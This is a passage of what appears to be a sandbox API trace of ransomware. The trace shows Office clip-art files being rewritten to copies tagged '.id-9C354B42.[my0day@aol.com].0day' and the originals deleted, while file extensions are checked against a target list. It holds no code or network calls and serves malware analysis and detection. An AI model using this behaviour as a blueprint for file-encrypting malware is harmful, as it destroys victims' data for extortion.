hTemplateFile=0x0) returned 0x240 [0053.857] GetLastError () returned 0x0 [0053.857] ReadFile (in: hFile=0x23c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x127e, lpOverlapped=0x0) returned 1 [0053.859] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1280, lpOverlapped=0x0) returned 1 [0053.859] ReadFile (in: hFile=0x23c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.859] WriteFile (in: hFile=0x240, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.860] SetEndOfFile (hFile=0x240) returned 1 [0053.860] CloseHandle (hObject=0x240) returned 1 [0053.860] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.860] SetEndOfFile (hFile=0x23c) returned 1 [0053.861] CloseHandle (hObject=0x23c) returned 1 [0053.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0053.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.861] lstrlenW (lpString=".doc") returned 4 [0053.861] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.861] lstrlenW (lpString=".docx") returned 5 [0053.861] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.861] lstrlenW (lpString=".pdf") returned 4 [0053.861] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.861] lstrlenW (lpString=".xls") returned 4 [0053.861] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.861] lstrlenW (lpString=".xlsx") returned 5 [0053.861] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.861] lstrlenW (lpString=".ppt") returned 4 [0053.861] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.861] lstrlenW (lpString=".zip") returned 4 [0053.861] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.861] lstrlenW (lpString=".rar") returned 4 [0053.861] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".bz2") returned 4 [0053.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".7z") returned 3 [0053.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString=".dbf") returned 4 [0053.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString=".1cd") returned 4 [0053.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString=".jpg") returned 4 [0053.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString=".doc") returned 4 [0053.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".docx") returned 5 [0053.862] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.862] lstrlenW (lpString=".pdf") returned 4 [0053.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".xls") returned 4 [0053.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.862] lstrlenW (lpString=".xlsx") returned 5 [0053.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.862] lstrlenW (lpString=".ppt") returned 4 [0053.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.862] lstrlenW (lpString=".zip") returned 4 [0053.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.862] lstrlenW (lpString=".rar") returned 4 [0053.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".bz2") returned 4 [0053.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.862] lstrlenW (lpString=".7z") returned 3 [0053.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.863] lstrlenW (lpString=".dbf") returned 4 [0053.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.863] lstrlenW (lpString=".1cd") returned 4 [0053.863] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0053.863] lstrlenW (lpString=".jpg") returned 4 [0053.863] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.863] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0053.863] lstrlenW (lpString="AN00790_.WMF") returned 12 [0053.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0054.967] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5684) returned 1 [0054.967] CloseHandle (hObject=0x1a8) returned 1 [0054.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 0x20 [0054.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0054.967] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.967] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.968] GetLastError () returned 0x0 [0054.968] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1634, lpOverlapped=0x0) returned 1 [0054.969] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1640, lpOverlapped=0x0) returned 1 [0054.970] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.971] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.971] SetEndOfFile (hFile=0x1d8) returned 1 [0054.971] CloseHandle (hObject=0x1d8) returned 1 [0054.971] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.971] SetEndOfFile (hFile=0x1a8) returned 1 [0054.972] CloseHandle (hObject=0x1a8) returned 1 [0054.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.972] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0054.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.972] lstrlenW (lpString=".doc") returned 4 [0054.972] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.972] lstrlenW (lpString=".docx") returned 5 [0054.972] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.972] lstrlenW (lpString=".pdf") returned 4 [0054.972] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString=".xls") returned 4 [0054.973] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.973] lstrlenW (lpString=".xlsx") returned 5 [0054.973] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.973] lstrlenW (lpString=".ppt") returned 4 [0054.973] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.973] lstrlenW (lpString=".zip") returned 4 [0054.973] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.973] lstrlenW (lpString=".rar") returned 4 [0054.973] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString=".bz2") returned 4 [0054.973] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString=".7z") returned 3 [0054.973] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.973] lstrlenW (lpString=".dbf") returned 4 [0054.973] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.973] lstrlenW (lpString=".1cd") returned 4 [0054.973] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0054.973] lstrlenW (lpString=".jpg") returned 4 [0054.973] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.974] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.974] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.974] GetLastError () returned 0x0 [0054.974] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x6cd2, lpOverlapped=0x0) returned 1 [0054.976] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x6ce0, lpOverlapped=0x0) returned 1 [0054.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.977] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.977] SetEndOfFile (hFile=0x1d8) returned 1 [0054.977] CloseHandle (hObject=0x1d8) returned 1 [0054.978] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.978] SetEndOfFile (hFile=0x1a8) returned 1 [0054.978] CloseHandle (hObject=0x1a8) returned 1 [0054.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.979] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0054.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.979] lstrlenW (lpString=".doc") returned 4 [0054.979] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.979] lstrlenW (lpString=".docx") returned 5 [0054.979] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.979] lstrlenW (lpString=".pdf") returned 4 [0054.979] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.979] lstrlenW (lpString=".xls") returned 4 [0054.979] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.979] lstrlenW (lpString=".xlsx") returned 5 [0054.979] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.979] lstrlenW (lpString=".ppt") returned 4 [0054.979] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.979] lstrlenW (lpString=".zip") returned 4 [0054.979] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.979] lstrlenW (lpString=".rar") returned 4 [0054.979] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.979] lstrlenW (lpString=".bz2") returned 4 [0054.980] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.980] lstrlenW (lpString=".7z") returned 3 [0054.980] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.980] lstrlenW (lpString=".dbf") returned 4 [0054.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.980] lstrlenW (lpString=".1cd") returned 4 [0054.980] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0054.980] lstrlenW (lpString=".jpg") returned 4 [0054.980] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.980] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.980] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.980] GetLastError () returned 0x0 [0054.980] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xea2, lpOverlapped=0x0) returned 1 [0054.982] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xeb0, lpOverlapped=0x0) returned 1 [0054.983] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.983] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.983] SetEndOfFile (hFile=0x1d8) returned 1 [0054.983] CloseHandle (hObject=0x1d8) returned 1 [0054.983] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.983] SetEndOfFile (hFile=0x1a8) returned 1 [0054.984] CloseHandle (hObject=0x1a8) returned 1 [0054.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.985] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0054.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.985] lstrlenW (lpString=".doc") returned 4 [0054.985] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString=".docx") returned 5 [0054.985] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.985] lstrlenW (lpString=".pdf") returned 4 [0054.985] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString=".xls") returned 4 [0054.985] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.985] lstrlenW (lpString=".xlsx") returned 5 [0054.985] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.985] lstrlenW (lpString=".ppt") returned 4 [0054.985] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.985] lstrlenW (lpString=".zip") returned 4 [0054.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.985] lstrlenW (lpString=".rar") returned 4 [0054.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString=".bz2") returned 4 [0054.985] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString=".7z") returned 3 [0054.985] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.985] lstrlenW (lpString=".dbf") returned 4 [0054.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.986] lstrlenW (lpString=".1cd") returned 4 [0054.986] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.986] lstrlenW (lpString=".jpg") returned 4 [0054.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.986] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.986] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.986] GetLastError () returned 0x0 [0054.986] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x16cc, lpOverlapped=0x0) returned 1 [0054.988] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x16d0, lpOverlapped=0x0) returned 1 [0054.989] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.989] WriteFile (in: hFile=0x1d8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.989] SetEndOfFile (hFile=0x1d8) returned 1 [0054.989] CloseHandle (hObject=0x1d8) returned 1 [0054.989] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.989] SetEndOfFile (hFile=0x1a8) returned 1 [0054.990] CloseHandle (hObject=0x1a8) returned 1 [0054.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0054.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.990] lstrlenW (lpString=".doc") returned 4 [0054.990] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.990] lstrlenW (lpString=".docx") returned 5 [0054.990] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.991] lstrlenW (lpString=".pdf") returned 4 [0054.991] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString=".xls") returned 4 [0054.991] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.991] lstrlenW (lpString=".xlsx") returned 5 [0054.991] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.991] lstrlenW (lpString=".ppt") returned 4 [0054.991] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0054.991] lstrlenW (lpString=".zip") returned 4 [0054.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.991] lstrlenW (lpString=".rar") returned 4 [0054.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.991] lstrlenW (lpString=".bz2") returned 4 [0054.991] 